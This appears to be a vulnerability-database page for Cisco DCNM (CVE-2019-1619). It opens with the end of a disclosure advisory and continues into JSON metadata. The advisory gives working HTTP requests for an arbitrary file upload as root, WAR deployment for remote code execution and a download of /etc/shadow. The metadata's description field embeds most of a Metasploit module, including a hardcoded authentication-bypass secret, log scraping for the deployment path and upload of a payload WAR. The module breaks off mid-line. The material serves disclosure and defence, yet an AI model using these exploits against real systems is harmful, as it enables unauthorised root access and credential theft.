                if (item.getFieldName().equalsIgnoreCase("uploadDir") && (uploadDir = item.getString()).equals(DEFAULT_TRUST_STORE_UPLOADDIR)) {
                    uploadDir = ClientCache.getJBossHome() + File.separator + "server" + File.separator + "fm" + File.separator + "conf";
                }
                atts.addAttribute("", "", "id", "CDATA", item.getFieldName());
                hd.startElement("", "", "field", atts);
                hd.characters(item.getString().toCharArray(), 0, item.getString().length());
                hd.endElement("", "", "field");
                atts.clear();
                continue;
            }
            ImageInputStream imageInputStream = ImageIO.createImageInputStream(item.getInputStream());
            Iterator<ImageReader> imageReaders = ImageIO.getImageReaders(imageInputStream);
            ImageReader imageReader = null;
            if (imageReaders.hasNext()) {
                imageReader = imageReaders.next();
            }
            try {
                String imageFormat = imageReader.getFormatName();
                String newFileName = fname + "." + imageFormat;
                if (allowedFormats.contains(imageFormat.toLowerCase())) {
                    FileFilter fileFilter = new FileFilter();
                    fileFilter.setImageTypes(allowedFormats);
                    File[] fileList = new File(uploadDir).listFiles(fileFilter);
                    for (int i = 0; i < fileList.length; ++i) {
                        new File(fileList[i].getAbsolutePath()).delete();
                    }
                    disk = new File(uploadDir + File.separator + fname);
                    item.write(disk);
                    Calendar calendar = Calendar.getInstance();
                    SimpleDateFormat simpleDateFormat = new SimpleDateFormat("MM.dd.yy hh:mm:ss aaa");
                    statusMessage = "File successfully written to server at " + simpleDateFormat.format(calendar.getTime());
                }
                imageReader.dispose();
                imageInputStream.close();
                atts.addAttribute("", "", "id", "CDATA", newFileName);
            }
            catch (Exception ex) {
                this.processUploadedFile(item, uploadDir, fname);
                Calendar calendar = Calendar.getInstance();
                SimpleDateFormat simpleDateFormat = new SimpleDateFormat("MM.dd.yy hh:mm:ss aaa");
                statusMessage = "File successfully written to server at " + simpleDateFormat.format(calendar.getTime());
                atts.addAttribute("", "", "id", "CDATA", fname);
            }
            hd.startElement("", "", "file", atts);
            hd.characters(statusMessage.toCharArray(), 0, statusMessage.length());
            hd.endElement("", "", "file");
        }
        hd.endElement("", "", "response");
        hd.endDocument();
        out.close();
    }
    catch (Exception e) {
        out.println(e.getMessage());
    }
}

handleUpload is more complex, but here's a summary; the function takes an HTTP form with a parameter "uploadDir", a parameter "fname" and then takes the last form object and writes it into "uploadDir/fname". However, there is a catch... the file has to be a valid image with one of the extensions listed here: allowedFormats.add("jpeg"); allowedFormats.add("png"); allowedFormats.add("gif"); allowedFormats.add("jpg"); allowedFormats.add("cert");

However, if you look closely, it is possible to upload any arbitrary content. This is because nothing bad happens until we reach the second (inner) try-catch block. Once inside, the first thing that happens is this: try { String imageFormat = imageReader.getFormatName();

... which will cause imageReader to throw and exception if the binary content we sent is not a file, sending us into the catch block: catch (Exception ex) { this.processUploadedFile(item, uploadDir, fname); Calendar calendar = Calendar.getInstance(); SimpleDateFormat simpleDateFormat = new SimpleDateFormat("MM.dd.yy hh:mm:ss aaa"); statusMessage = "File successfully written to server at " + simpleDateFormat.format(calendar.getTime()); atts.addAttribute("", "", "id", "CDATA", fname);

... meaning that the file contents, upload dir and its name are sent into processUploadedFile.

Let's look into that now: private void processUploadedFile(FileItem item, String uploadDir, String fname) throws Exception { try { int offset; int contentLength = (int)item.getSize(); InputStream raw = item.getInputStream(); BufferedInputStream in = new BufferedInputStream(raw); byte[] data = new byte[contentLength]; int bytesRead = 0; for (offset = 0; offset < contentLength && (bytesRead = in.read(data, offset, data.length - offset)) != -1; offset += bytesRead) { } in.close(); if (offset != contentLength) { throw new IOException("Only read " + offset + " bytes; Expected " + contentLength + " bytes"); } FileOutputStream out = new FileOutputStream(uploadDir + File.separator + fname); out.write(data); out.flush(); out.close(); } catch (Exception ex) { throw new Exception("FileUploadSevlet processUploadFile failed: " + ex.getMessage()); } }

Amazingly, this function totally ignores the content, and simple writes the file contents to the filename and folder we have indicated. In summary, if we send any binary content that is not a file, we can write it to any new file in any directory as root.

If we send the following request: POST /fm/fileUpload HTTP/1.1 Host: 10.75.1.40 Cookie: JSESSIONID=PcW4XFtcG6fkMUg7FpkZYJ5C; Content-Length: 429 Content-Type: multipart/form-data; boundary=---------------------------9313517619947

-----------------------------9313517619947 Content-Disposition: form-data; name="fname"

owned -----------------------------9313517619947 Content-Disposition: form-data; name="uploadDir"

/tmp/ -----------------------------9313517619947 Content-Disposition: form-data; name="filePath"; filename="whatever" Content-Type: application/octet-stream

-----------------------------9313517619947--

The server will respond with: HTTP/1.1 200 OK X-FRAME-OPTIONS: SAMEORIGIN Content-Type: text/xml;charset=utf-8 Date: Mon, 03 Sep 2018 00:57:11 GMT Connection: close Server: server

owned /tmp/ File successfully written to server at 09.02.18 05:57:11 PM

And our file has been written as root on the server: [root@dcnm_vm ~]# ls -l /tmp/ (...) -rw-r--r-- 1 root root 16 Sep 2 17:57 owned (...)

Finally if we write a WAR file to the JBoss deployment directory, and the server will deploy the WAR file as root, allowing the attacker to achieve remote code execution.

A Metasploit module that exploits this vulnerability has been released with this advisory. An authenticated user can abuse this servlet to download arbitrary files as root [5].

The code below shows the servlet request processing code: com.cisco.dcbu.web.client.util.DownloadServlet

public void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    Credentials cred = (Credentials)((Object)request.getSession().getAttribute("credentials"));
    if (cred == null || !cred.isAuthenticated()) {
        throw new ServletException("User not logged in or Session timed out.");
    }
    String showFile = (String)request.getAttribute("showFile");
    if (showFile == null) {
        showFile = request.getParameter("showFile");
    }
    File f = new File(showFile);
    if (showFile.endsWith(".cert")) {
        response.setContentType("application/octet-stream");
        response.setHeader("Pragma", "cache");
        response.setHeader("Cache-Control", "cache");
        response.setHeader("Content-Disposition", "attachment; filename=fmserver.cert;");
    } else if (showFile.endsWith(".msi")) {
        response.setContentType("application/x-msi");
        response.setHeader("Pragma", "cache");
        response.setHeader("Cache-Control", "cache");
        response.setHeader("Content-Disposition", "attachment; filename=" + f.getName() + ";");
    } else if (showFile.endsWith(".xls")) {
        response.setContentType("application/vnd.ms-excel");
        response.setHeader("Pragma", "cache");
        response.setHeader("Cache-Control", "cache");
        response.setHeader("Content-Disposition", "attachment; filename=" + f.getName() + ";");
    }
    ServletOutputStream os = response.getOutputStream();
    FileInputStream is = new FileInputStream(f);
    byte[] buffer = new byte[4096];
    int read = 0;
    try {
        while ((read = is.read(buffer)) > 0) {
            os.write(buffer, 0, read);
        }
        os.flush();
    }
    catch (Exception e) {
        LogService.log(LogService._WARNING, e.getMessage());
    }
    finally {
        is.close();
    }
}

}

As you can see, it's quite simple. It takes a "showFile" request parameter, reads that file and returns to the user. Here's an example of the servlet in action:

Request: GET /fm/downloadServlet?showFile=/etc/shadow HTTP/1.1 Host: 10.75.1.40 Cookie: JSESSIONID=PcW4XFtcG6fkMUg7FpkZYJ5C;

Response: HTTP/1.1 200 OK

root:$1$(REDACTED).:17763:0:99999:7::: bin::15980:0:99999:7::: daemon::15980:0:99999:7::: adm::15980:0:99999:7::: lp::15980:0:99999:7::: (...)

An interesting file to download is /usr/local/cisco/dcm/fm/conf/server.properties, which contains the database credentials as well as the sftp root password, both encrypted with a key that is hardcoded in the source code.

A Metasploit module that exploits this vulnerability has been released with this advisory. This servlet can be accessed by an unauthenticated attacker, and it will return all the log files in /usr/local/cisco/dcm/fm/logs/* in ZIP format, which provide information about local directories, software versions, authentication errors, detailed stack traces, etc [6].

To access it, simply request: GET /fm/log/fmlogs.zip

Code is not shown here for brevity, but the implementation class is com.cisco.dcbu.web.client.admin.LogZipperServlet.

Fix: For #1, upgrade to DCNM 11.0(1) and above [3]. For #2 and #3, upgrade to DCNM 11.2(1) and above [4] [5]. For #4, it is not clear from Cisco's advisory on which version it was fixed [6].

References: [1] https://www.accenture.com/us-en/service-idefense-security-intelligence [2] https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/prime-data-center-network-manager/datasheet-c78-740978.html [3] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass [4] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex [5] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld [6] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-infodiscl

Disclaimer: Please note that Agile Information Security relies on the information provided by the vendor when listing fixed versions or products. Agile Information Security does not verify this information, except when specifically mentioned in this advisory or when requested or contracted by the vendor to do so. Unconfirmed vendor fixes might be ineffective or incomplete, and it is the vendor's responsibility to ensure the vulnerablities found by Agile Information Security are resolved properly. Agile Information Security Limited does not accept any responsiblity, financial or otherwise, from any material losses, loss of life or reputational loss as a result of misuse of the information or code contained or mentioned in this advisory. It is the vendor's responsibility to ensure their products' security before, during and after release to market.

All information, code and binary data in this advisory is released to the public under the GNU General Public License, version 3 (GPLv3). For information, code or binary data obtained from other sources that has a license which is incompatible with GPLv3, the original license prevails. For more information check https://www.gnu.org/licenses/gpl-3.0.en.html

================ Agile Information Security Limited http://www.agileinfosec.co.uk/

Enabling secure digital business

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201906-0566",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.4\\(2\\)"
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "cisco",
        "version": "10.4(2)"
      },
      {
        "model": "data center network manager",
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0(1)"
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.4(1)"
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3(1)"
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.2(1)"
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.1(1)"
      },
      {
        "model": "data center network manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.0(1)"
      },
      {
        "model": "data center network manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1(1)"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "BID",
        "id": "108902"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:cisco:data_center_network_manager:10.4\\(2\\):*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerability described in this advisory. The Cisco PSIRT is not aware of any malicious use of the vulnerability that is described in this advisory.,Metasploit,Pedro Ribeiro.",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2019-1619",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 7.5,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2019-1619",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 10.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2019-19824",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-148311",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "ykramarz@cisco.com",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2019-1619",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-1619",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "ykramarz@cisco.com",
            "id": "CVE-2019-1619",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2019-19824",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201906-1044",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-148311",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2019-1619",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2019-19824"
      },
      {
        "db": "VULHUB",
        "id": "VHN-148311"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-1619"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-005758"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201906-1044"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-1619"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability in the web-based management interface of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device. The vulnerability is due to improper session management on affected DCNM software. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device. Cisco Data Center Network Manager (DCNM) Contains an access control vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Cisco DataCenter NetworkManager (DCNM) is Cisco\u0027s suite of data center network managers that enable multi-protocol management of the network and provide troubleshooting capabilities for the health and performance of the switch. This may lead to further attacks. \nThis issue is being tracked by Cisco bug ID CSCvo64641. \n        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n        work on a few versions below 10.4(2). \n      },\n      \u0027Author\u0027         =\u003e\n        [\n          \u0027Pedro Ribeiro \u003cpedrib[at]gmail.com\u003e\u0027        # Vulnerability discovery and Metasploit module\n        ],\n      \u0027License\u0027        =\u003e MSF_LICENSE,\n      \u0027References\u0027     =\u003e\n        [\n          [ \u0027CVE\u0027, \u00272019-1619\u0027 ], # auth bypass\n          [ \u0027CVE\u0027, \u00272019-1620\u0027 ], # file upload\n          [ \u0027CVE\u0027, \u00272019-1622\u0027 ], # log download\n          [ \u0027URL\u0027, \u0027https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass\u0027 ],\n          [ \u0027URL\u0027, \u0027https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex\u0027 ],\n          [ \u0027URL\u0027, \u0027https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex\u0027 ],\n          [ \u0027URL\u0027, \u0027https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb\u0027 ],\n          [ \u0027URL\u0027, \u0027https://seclists.org/fulldisclosure/2019/Jul/7\u0027 ]\n        ],\n      \u0027Platform\u0027       =\u003e \u0027java\u0027,\n      \u0027Arch\u0027           =\u003e ARCH_JAVA,\n      \u0027Targets\u0027        =\u003e\n        [\n          [ \u0027Automatic\u0027, {} ],\n          [\n            \u0027Cisco DCNM 11.1(1)\u0027, {}\n          ],\n          [\n            \u0027Cisco DCNM 11.0(1)\u0027, {}\n          ],\n          [\n            \u0027Cisco DCNM 10.4(2)\u0027, {}\n          ]\n        ],\n      \u0027Privileged\u0027     =\u003e true,\n      \u0027DefaultOptions\u0027 =\u003e { \u0027WfsDelay\u0027 =\u003e 10 },\n      \u0027DefaultTarget\u0027  =\u003e 0,\n      \u0027DisclosureDate\u0027 =\u003e \u0027Jun 26 2019\u0027\n    ))\n\n    register_options(\n      [\n        Opt::RPORT(443),\n        OptBool.new(\u0027SSL\u0027, [true, \u0027Connect with TLS\u0027, true]),\n        OptString.new(\u0027TARGETURI\u0027, [true,  \"Default server path\", \u0027/\u0027]),\n        OptString.new(\u0027USERNAME\u0027, [true,  \"Username for auth (required only for 11.0(1) and above\", \u0027admin\u0027]),\n        OptString.new(\u0027PASSWORD\u0027, [true,  \"Password for auth (required only for 11.0(1) and above\", \u0027admin\u0027]),\n      ])\n  end\n\n  def check\n    # at the moment this is the best way to detect\n    # check if pmreport and fileUpload servlets return a 500 error with no params\n    res = send_request_cgi(\n      \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm\u0027, \u0027pmreport\u0027),\n      \u0027vars_get\u0027  =\u003e\n      {\n        \u0027token\u0027  =\u003e rand_text_alpha(5..20)\n      },\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    )\n    if res \u0026\u0026 res.code == 500\n      res = send_request_cgi(\n        \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm\u0027, \u0027fileUpload\u0027),\n        \u0027method\u0027 =\u003e \u0027GET\u0027,\n      )\n      if res \u0026\u0026 res.code == 500\n        return CheckCode::Detected\n      end\n    end\n\n    CheckCode::Unknown\n  end\n\n  def target_select\n    if target != targets[0]\n      return target\n    else\n      res = send_request_cgi(\n        \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm\u0027, \u0027fmrest\u0027, \u0027about\u0027,\u0027version\u0027),\n        \u0027method\u0027 =\u003e \u0027GET\u0027\n      )\n      if res \u0026\u0026 res.code == 200\n        if res.body.include?(\u0027version\":\"11.1(1)\u0027)\n          print_good(\"#{peer} - Detected DCNM 11.1(1)\")\n          print_status(\"#{peer} - No authentication required, ready to exploit!\")\n          return targets[1]\n        elsif res.body.include?(\u0027version\":\"11.0(1)\u0027)\n          print_good(\"#{peer} - Detected DCNM 11.0(1)\")\n          print_status(\"#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit\")\n          return targets[2]\n        elsif res.body.include?(\u0027version\":\"10.4(2)\u0027)\n          print_good(\"#{peer} - Detected DCNM 10.4(2)\")\n          print_status(\"#{peer} - No authentication required, ready to exploit!\")\n          return targets[3]\n        else\n          print_error(\"#{peer} - Failed to detect target version.\")\n          print_error(\"Please contact module author or add the target yourself and submit a PR to the Metasploit project!\")\n          print_error(res.body)\n          print_status(\"#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass\")\n          return targets[3]\n        end\n      end\n      fail_with(Failure::NoTarget, \"#{peer} - Failed to determine target\")\n    end\n  end\n\n  def auth_v11\n    res = send_request_cgi(\n      \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm/\u0027),\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027vars_get\u0027  =\u003e\n      {\n        \u0027userName\u0027  =\u003e datastore[\u0027USERNAME\u0027],\n        \u0027password\u0027  =\u003e datastore[\u0027PASSWORD\u0027]\n      },\n    )\n\n    if res \u0026\u0026 res.code == 200\n      # get the JSESSIONID cookie\n      if res.get_cookies\n        res.get_cookies.split(\u0027;\u0027).each do |cok|\n          if cok.include?(\"JSESSIONID\")\n            return cok\n          end\n        end\n      end\n    end\n  end\n\n  def auth_v10\n    # step 1: get a JSESSIONID cookie and the server Date header\n    res = send_request_cgi(\n      \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm/\u0027),\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    )\n\n    # step 2: convert the Date header and create the auth hash\n    if res \u0026\u0026 res.headers[\u0027Date\u0027]\n      jsession = res.get_cookies.split(\u0027;\u0027)[0]\n      date = Time.httpdate(res.headers[\u0027Date\u0027])\n      server_date = date.strftime(\"%s\").to_i * 1000\n      print_good(\"#{peer} - Got sysTime value #{server_date.to_s}\")\n\n      # auth hash format:\n      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\n      session_id = rand(1000..50000).to_s\n      md5 = Digest::MD5.digest \u0027admin\u0027 + session_id + server_date.to_s +\n        \"POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF\"\n      md5_str = Base64.strict_encode64(md5)\n\n      # step 3: authenticate our cookie as admin\n      # token format: sessionId.sysTime.md5_str.username\n      res = send_request_cgi(\n        \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm\u0027, \u0027pmreport\u0027),\n        \u0027cookie\u0027 =\u003e jsession,\n        \u0027vars_get\u0027  =\u003e\n        {\n          \u0027token\u0027  =\u003e \"#{session_id}.#{server_date.to_s}.#{md5_str}.admin\"\n        },\n        \u0027method\u0027 =\u003e \u0027GET\u0027\n      )\n\n      if res \u0026\u0026 res.code == 500\n        return jsession\n      end\n    end\n  end\n\n  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log\n  def get_war_path\n    res = send_request_cgi(\n      \u0027uri\u0027    =\u003e normalize_uri(target_uri.path, \u0027fm\u0027, \u0027log\u0027, \u0027fmlogs.zip\u0027),\n      \u0027method\u0027 =\u003e \u0027GET\u0027\n    )\n\n    if res \u0026\u0026 res.code == 200\n      tmp = Tempfile.new\n      # we have to drop this into a file first\n      # else we will get a Zip::GPFBit3Error if we use an InputStream\n      File.binwrite(tmp, res.body)\n      Zip::File.open(tmp) do |zis|\n        zis.each do |entry|\n          if entry.name =~ /jboss[0-9]*\\.log/\n            fdata = zis.read(entry)\n            if fdata[/Started FileSystemDeploymentService for directory ([\\w\\/\\\\\\-\\.:]*)/]\n              tmp.close\n              tmp.unlink\n              return $1.strip\n            end\n          end\n        end\n      end\n    end\n  end\n\n\n  def exploit\n    target = target_select\n\n    if target == targets[2]\n      jsession = auth_v11\n    elsif target == targets[3]\n      jsession = auth_v10\n    end\n\n    # targets[1] DCNM 11.1(1) doesn\u0027t need auth!\n    if jsession.nil? \u0026\u0026 target != targets[1]\n      fail_with(Failure::NoAccess, \"#{peer} - Failed to authenticate JSESSIONID cookie\")\n    elsif target != targets[1]\n      print_good(\"#{peer} - Successfully authenticated our JSESSIONID cookie\")\n    end\n\n    war_path = get_war_path\n    if war_path.nil? or war_path.empty?\n      fail_with(Failure::Unknown, \"#{peer} - Failed to get WAR path from logs\")\n    else\n      print_good(\"#{peer} - Obtain WAR path from logs: #{war_path}\")\n    end\n\n    # Generate our payload... and upload it\n    app_base = rand_text_alphanumeric(6..16)\n    war_payload = payload.encoded_war({ :app_name =\u003e app_base }).to_s\n\n    fname = app_base + \u0027.war\u0027\n    post_data = Rex::MIME::Message.new\n    post_data.add_part(fname, nil, nil, content_disposition = \"form-data; name=\\\"fname\\\"\")\n    post_data.add_part(war_path, nil, nil, content_disposition = \"form-data; name=\\\"uploadDir\\\"\")\n    post_data.add_part(war_payload,\n                       \"application/octet-stream\", \u0027binary\u0027,\n                       \"form-data; name=\\\"#{rand_text_alpha(5..20)}\\\"; filename=\\\"#{rand_text_alpha(6..10)}\\\"\")\n    data = 